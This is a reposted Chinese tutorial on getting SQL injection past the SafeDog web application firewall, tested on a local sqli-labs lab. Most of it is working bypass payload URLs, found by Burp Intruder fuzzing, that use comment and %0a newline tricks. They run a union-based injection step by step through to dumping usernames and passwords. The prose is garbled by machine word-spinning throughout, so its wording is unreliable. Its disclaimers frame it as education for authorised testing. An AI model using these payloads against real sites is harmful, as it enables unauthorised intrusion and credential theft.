SQL注入绕过安全狗的waf防火墙,这一篇就够了,8k文案超详细
安全狗WAF绕过系列一、WAF概述
WAF(Web应用防火墙)作为一种专为Web应用步调筹划的安全防护工具,其焦点功能在于通过实施一系列针对HTTP/HTTPS协议的安全计谋,来加强Web应用的安全性。WAF内置了精心筹划的检测逻辑与规则集,这些规则旨在对每一个进入系统的哀求内容进行细致查察,并对任何违背安全计谋的哀求接纳即时且有效的防御措施,从而维护Web应用环境的纯净与安全。
二、WAF工作机制详解
WAF的工作流程精心构建,涵盖四个关键环节:预处理、规则匹配、相应处理以及日记记录,共同编织成一张精密的安全防护网。
[*] 「预处理阶段」:此阶段,WAF起首担任起“守门人”的角色,对全部进入的数据哀求流量进行开端筛选,确认其是否遵循HTTP/HTTPS协议标准。紧接着,WAF会利用预设的白名单机制,快速辨认并放行那些已知安全或信托的URL哀求,直接引导它们进入后端Web服务器进行处理。对于未能通过白名单验证的哀求,WAF则进一步深入,对其数据包进行精细剖析,为后续的安全检测做准备。
[*] 「规则匹配阶段」:此为焦点环节,WAF利用其内置的强大规则引擎,对经过剖析的数据包进行深度扫描与匹配。这些规则覆盖了广泛的攻击场景与模式,包罗但不限于SQL注入、跨站脚本(XSS)、下令注入等常见Web安全威胁。通过这一过程,WAF可以或许精准辨认出潜在的恶意哀求,为后续的安全相应奠定坚固基础。
[*] 「相应处理阶段」:基于规则匹配的结果,WAF的相应处理模块将接纳针对性的防御措施。对于符合安全规则的哀求,WAF会毫无拦阻地将其转发至后端Web服务器,确保用户哀求得到及时相应。而对于那些被判定为恶意或非常的哀求,WAF则展现出其防御实力,通过阻断哀求、记录日记或触发告警等多种方式,有效遏制潜在的安全风险,保护Web应用免受陵犯。
三、常见的waf绕过姿势
常见的WAF(Web应用防火墙)绕过姿势包罗但不限于以下几种:
[*] 「提交方式变换」:许多WAF默认配置下主要对GET哀求进行过滤,而忽略POST哀求、Cookie、HTTP头等其他提交方式。因此,可以尝试将攻击载荷通过不同的提交方式进行发送,以绕过WAF的检测。
[*] 「大小写替换和编码绕过」:利用WAF规则大概不区分大小写或无法完全剖析编码后的攻击载荷,通过将攻击语句中的关键字进行大小写替换或使用URL编码、Base64编码等方式进行编码,以绕过WAF的过滤规则。
[*] 「事件函数变换」:WAF会重点辨认触发JavaScript代码执行的事件函数字段,如onclick。通过变换事件函数名称或利用其他不常见的事件函数,可以尝试绕过WAF的辨认。
[*] 「解释符和内联解释」:使用SQL解释符(如--、#)或HTML/JavaScript解释(如<!-- -->、//)来绕过WAF对特定关键字的过滤。偶然,将攻击载荷与解释符联合使用,可以诱骗WAF使其忽略部分攻击载荷。
[*] 「分片传输」:通过调整HTTP哀求中的Content-Length头部,将攻击载荷分成多个部分发送,大概导致WAF无法完整剖析哀求内容,从而绕过检测。
[*] 「利用WAF软肋」:WAF在部署时大概因性能思量而留下一些软肋,如对某些特殊字符或组合的检测不敷严酷。通过分析和测试WAF的行为,大概发现并利用这些软肋进行绕过。
[*] 「爬虫白名单绕过」:部分WAF提供爬虫白名单功能,通过伪装成爬虫(修改User-Agent或模拟爬虫行为)大概绕过WAF的检测。
[*] 「高并发流量攻击」:通过发送大量垃圾数据或高并发哀求,使WAF装备进入Bypass IPS模式或达到性能极限,从而临时或永世性地绕过WAF的防护。
请留意,上述绕过姿势仅供安全研究和教育目的使用。未经授权的渗透测试和网络攻击是非法行为,大概会对个人和构造造成严重的法律结果。在进行任何渗透测试之前,请确保已得到合法授权。
四、安全狗绕过姿势
环境:phpstudy—apache2.4.39
安全狗官网v4.0下载(应该是最新版):https://www.safedog.cn/website_safedog.html
在开始之前,如果没有sql注入基础的的童鞋,还请观看我的别的一篇文章,1w字超详细剖析。
以下内容皆使用sqli第一关进行测试
https://img-blog.csdnimg.cn/img_convert/5ac88e6eea8f470535dededd254c9445.png
image-20240716111521447
测试 id=1' and 1=1
http://192.168.209.131/Less-1/?id=-1' and 1=1
https://img-blog.csdnimg.cn/img_convert/b74fa439f6ee61f33e996e4cd05f0079.png
image-20240715165511624
在之前的尝试中,我们发现直接使用“and 1=1”这种方法似乎并不奏效,这很大概是由于安全狗系统辨认并过滤了“and”这个词。为了更深入地了解安全狗是怎样辨认并拦截这类操作的,我们可以尝试将“and 1=1”进行拆分
http://192.168.10.129:8080/sqli/Less-1/?id=1' and --+
http://192.168.10.129:8080/sqli/Less-1/?id=1' 1=1 --+
发现两个页面均返回SQL语法错误,这表明安全狗不会单独过滤‘and’或‘1=1’。我推测它大概是辨认到‘and’后紧跟空格和字符的模式。为了验证这一点,我决定进行实验。
http://192.168.10.129:8080/sqli/Less-1/?id=1' and1--+
http://192.168.10.129:8080/sqli/Less-1/?id=1' and 1--+
实验结果,证实了确实是and+空格+字符串的格式会被拦截。
这里我们就可以开始尝试利用「解释符」、「回车符%0a」等来代替空格进行绕过了!!
在此输入:
http://192.168.10.129:8080/sqli/Less-1/?id=1' and/**/1=1--+
发现仍旧不可,打开burp suite,拦截下我们阻截的包,添加$payload到我们测试的「解释符」中然后点击发送到「intruder」模块,选择如下:
https://img-blog.csdnimg.cn/img_convert/b6fbd37c5cc9c8f2ef5ce25be2602233.png
image-20240715170533486
然后,点击pyload,选择「暴力破解」(Brute forcer):
https://img-blog.csdnimg.cn/img_convert/dfdd3cc12cfd22249b224fda0ecb3664.png
image-20240715170457261
attack,开始攻击,安全狗有流量攻击的防御,反面大概会被拦截,解决办法直接「重启」apache服务器。好了这里测试完成了,点击length更改默认排序,我们拿每个哀求成功payload(查抄response即可查察是否成功,如果用户名正常显示,阐明该字符payload安全狗没有进行拦截)。
https://img-blog.csdnimg.cn/img_convert/f6169f368db14ea64b324d602f3b9748.png
image-20240715170405683
我们任意娶一个/!*得到payload和解释符拼接/*/!**/,这个时间and和反面的1=1之间用这个拼接的符号进行连接即可
http://192.168.209.131/Less-1/?id=1' and/*/!**/1=1 --+
可以绕过了
https://img-blog.csdnimg.cn/img_convert/96a7baac15cffe912fe3b3930129f2a0.png
image-20240715170823637
order by测试,我们用之前的测试结果,利用/*/!**/这一个充当空格,测试「order by 3」,然后看看能否成功?
http://192.168.209.131/Less-1/?id=1' order/*/!**/by 3 --+
https://img-blog.csdnimg.cn/img_convert/3a0929056454377ac009152af550b016.png
image-20240715172306698
完善,接下来测试连合注入。平凡测试union select:
http://192.168.209.131/Less-1/?id=1' union select --+
https://img-blog.csdnimg.cn/img_convert/969c62b1b103548e36be433e0e82028d.png
image-20240715172414774
union关键字测试,有回显
http://192.168.209.131/Less-1/?id=1' union --+
https://img-blog.csdnimg.cn/img_convert/9c72864de227e54735d58a6e143c76e6.png
image-20240715172507322
select关键字测试,有回显
http://192.168.209.131/Less-1/?id=1' select --+
https://img-blog.csdnimg.cn/img_convert/894b57a97db3e341655901b5e2163e91.png
image-20240715172540647
已知安全狗WAF对连合注入的拦截规则是辨认到union select字符串。为了探索是否能利用解释符绕过这一规则,我决定采用与之前相同的方法,利用Burp进行抓包,并加强「fuzz测试」中的参数进行暴力破解尝试。
https://img-blog.csdnimg.cn/img_convert/c6883b420d7dd28b0f3b195e6ee5b8b0.png
image-20240715205818846
任意选择几个1002长度的相应结果
https://img-blog.csdnimg.cn/img_convert/2bbbb72181d3961b72c9ba24af6d7989.png
image-20240715205744548
这里我们选择payload,取/!*!/,构造解释符+payload,为/*/!*!/*/,插入union和select之间,绕过成功
http://192.168.5.64/Less-1/?id=1' union/*/!*!/*/select 1,2,3 --+
https://img-blog.csdnimg.cn/img_convert/17311965b09c1096c358c78990393084.png
image-20240715210114937
这里另有一个思绪,可以利用--+%0a这种格式通过换行继续执行,这里我们试一下看看:
❝Tips:我的另一篇sql注入文章有写过%0a的作用,背景回复【sql注入】【sql】等关键字即可查察
❞http://192.168.5.64/Less-1/?id=-1%27%20union/*!--+/*%0aselect%201,database(),3*/%20--+
相当于在普通sql语句中的
http://192.168.5.64/Less-1/?id=-1' union/*!--+/*
select 1,database(),3*/ --+
https://img-blog.csdnimg.cn/img_convert/9e13257639d592b76f89ba91d7b0fcea.png
image-20240715211304899
尝试报数据库
http://192.168.5.64/Less-1/?id=-1' union/*/!*!/*/select 1,database(),3 --+
发现database()被拦截了
https://img-blog.csdnimg.cn/img_convert/d19ef1b8f5e5b7038cf8585530cbfed3.png
image-20240715211803058
我们把database的()给去掉
http://192.168.5.64/Less-1/?id=-1' union/*/!*!/*/select 1,database,3 --+
报错,此时就可以确定,安全狗应该是将database()进行检测
https://img-blog.csdnimg.cn/img_convert/2a02dc1aebace5a5d4b6db3b0ca4d874.png
image-20240715212006918
然后我们继续使用解释符大概内联解释符看看吧:
继续采用burp的「fuzz测试」:添加上变量
https://img-blog.csdnimg.cn/img_convert/0e81f333146a5781646776446a15f008.png
image-20240715213751892
扫出来4个/可以用,最简单的
https://img-blog.csdnimg.cn/img_convert/57a145ef53ebf55b76fb22656873f7de.png
image-20240715213840696
和之前一样,就不强调了,取解释符+payload,构造payload
http://192.168.5.64/Less-1/?id=-1' union/*/!*!/*/select 1,database/**/(),3 --+
https://img-blog.csdnimg.cn/img_convert/fb43dabf825009372c3e50dc13aaba4d.png
image-20240715214011786
成功了!接下来一个一个关键词测试,group_concat()
http://192.168.5.64/Less-1/?id=-1' union/*/!*!/*/select 1,database/**/(),group_concat(table_name) --+
https://img-blog.csdnimg.cn/img_convert/f9a7260a4a9b510d587573087680bc09.png
image-20240715214342969
没有拦截,继续from
http://192.168.5.64/Less-1/?id=-1' union/*/!*!/*/select 1,database/**/(),group_concat(table_name) from --+
https://img-blog.csdnimg.cn/img_convert/3e1a601adb7ed534a79ff4afee104620.png
image-20240715214416033
informtion_schema.tables,结果就不可了
http://192.168.5.64/Less-1/?id=-1' union/*/!*!/*/select 1,database/**/(),group_concat(table_name) from informtion_schema.tables --+
https://img-blog.csdnimg.cn/img_convert/beb952253ffcb8471990d17773182566.png
image-20240715215224759
测试%0a
http://192.168.209.131/Less-1/?id=-1%27%20union/*/!*!/*/select%201,database/**/(),group_concat(table_name)%20from%20/*!--%20/*%0ainformation_schema.tables*/
相当于
http://192.168.209.131/Less-1/?id=-1' union/*/!*!/*/select 1,database/**/(),group_concat(table_name) from /*!-- /*
information_schema.tables*/
https://img-blog.csdnimg.cn/img_convert/da233929bc35c7416097d31f61655cc0.png
image-20240716093748206
测试查当前数据库的表名,前面已经测试过database()了
http://192.168.209.131/Less-1/?id=-1%27%20union/*/!*!/*/select%201,database/**/(),group_concat(table_name)%20from%20/*!--%20/*%0ainformation_schema.tables*/where%20table_schema=database/**/()%20--+
相当于
http://192.168.209.131/Less-1/?id=-1' union/*/!*!/*/select 1,database/**/(),group_concat(table_name) from /*!-- /*
information_schema.tables*/where table_schema=database/**/() --+
https://img-blog.csdnimg.cn/img_convert/fc0e6322ddb6e043d652462a49f26032.png
image-20240716093930467
爆字段,测试到and,table_name都没拦截
http://192.168.209.131/Less-1/?id=-1%27%20union/*/!*!/*/select%201,database/**/(),group_concat(column_name)%20from%20/*!--%20/*%0ainformation_schema.tables*/where%20table_schema=database/**/()%20and%20table_name%20--+
相当于
http://192.168.209.131/Less-1/?id=-1' union/*/!*!/*/select 1,database/**/(),group_concat(column_name) from /*!-- /*
information_schema.tables*/where table_schema=database/**/() and table_name --+
https://img-blog.csdnimg.cn/img_convert/70e1318e2c682b98348e4f85f6c224ba.png
image-20240716095210635
直到table_name反面加了个=
http://192.168.209.131/Less-1/?id=-1%27%20union/*/!*!/*/select%201,database/**/(),group_concat(column_name)%20from%20/*!--%20/*%0ainformation_schema.tables*/where%20table_schema=database/**/()%20and%20table_name=%20--+
相当于
http://192.168.209.131/Less-1/?id=-1' union/*/!*!/*/select 1,database/**/(),group_concat(column_name) from /*!-- /*
information_schema.tables*/where table_schema=database/**/() and table_name= --+
https://img-blog.csdnimg.cn/img_convert/0b86a255148555921c7d3b43e5da0f41.png
image-20240716095144657
那么开始「fuzz测试」爆破
https://img-blog.csdnimg.cn/img_convert/a104d217950110b6f5abe0829c806c9d.png
image-20240716103253642
任意娶一个payload和解释符进行拼接,如下
http://192.168.209.131/Less-1/?id=-1%27%20union/*/!*!/*/select%201,database/**/(),group_concat(column_name)%20from%20/*!--%20/*%0ainformation_schema.columns*/where%20table_schema=database/**/()%20and%20table_name/*/***/=%22users%22%20--+
相当于
http://192.168.209.131/Less-1/?id=-1' union/*/!*!/*/select 1,database/**/(),group_concat(column_name) from /*!-- /*
information_schema.columns*/where table_schema=database/**/() and table_name/*/***/="users" --+
https://img-blog.csdnimg.cn/img_convert/eba3dae6ac264fddeaeba6d9466a970e.png
image-20240716103446751
回车%0a的绕过方式
http://192.168.209.131/Less-1/?id=-1%27%20union/*/!*!/*/select%201,database/**/(),group_concat(column_name)%20from%20/*!--%20/*%0ainformation_schema.columns*/where%20table_schema=database/**/()%20and%20/*!--%20/*%0atable_name*/=%22users%22%20--+
相当于
http://192.168.209.131/Less-1/?id=-1' union/*/!*!/*/select 1,database/**/(),group_concat(column_name) from /*!-- /*
information_schema.columns*/where table_schema=database/**/() and /*!-- /*
table_name*/="users" --+
https://img-blog.csdnimg.cn/img_convert/b919c504e0f246cfcbcce83e67dc4a1e.png
image-20240716103752507
爆数据,已知表名为users,字段为id,username,password,并设置每个字段的分隔符为-,separator '-'
http://192.168.209.131/Less-1/?id=-1%27%20union/*/!*!/*/select%201,database/**/(),group_concat(id,username,password%20separator%20%27-%27)%20from%20/*!--%20/*%0ausers*/%20--+
相当于
http://192.168.209.131/Less-1/?id=-1' union/*/!*!/*/select 1,database/**/(),group_concat(id,username,password separator '-') from /*!-- /*
users*/ --+
https://img-blog.csdnimg.cn/img_convert/4f619823099da9cbc12da62609c3802a.png
image-20240716104419572
总结
通过本文的详细剖析和实验,我们深入了解了SQL注入攻击的根本原理及其在现实应用中的变种和绕过本领。在面对如安全狗这样的WAF防护时,攻击者并非束手无策,而是可以通过多种方式绕过检测规则,成功实施SQL注入攻击。
本文起首通过基础的SQL注入测试,验证了安全狗WAF对“and 1=1”等简单SQL注入模式的辨认能力。随后,通过拆分和解释符的使用,我们发现WAF大概是通过辨认特定模式(如“and”后紧跟空格和字符)来拦截SQL注入的。基于此发现,我们进一步尝试利用解释符、换行符等技能本事绕过WAF的检测,成功实施了更复杂的SQL注入攻击,包罗连合查询注入,获取数据库表名、列名以及具体数据等。
通过本文的学习,我们不仅可以或许加深对SQL注入攻击的理解,还可以或许掌握一些实用的绕过WAF防护的本领。然而,必要强调的是,这些本领仅用于合法的安全测试和教育目的,「任何未经授权的SQL注入攻击都是非法的」,并大概带来严重的法律结果。因此,我们呼吁广大开发人员和安全从业者,应连续关注和提升Web应用的安全性,共同维护网络空间的安全与稳固。
❝「免责声明」:本渗透教程仅供安全研究与教育目的使用。任何未经授权的网络活动均属非法。读者应确保拥有合法权限,并对自己的行为负责。教程内容不包管绝对安全或成功,使用风险自负。
❞原文:SQL注入绕过某狗的waf防火墙,这一篇就够了,6k文案超详细
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
页:
[1]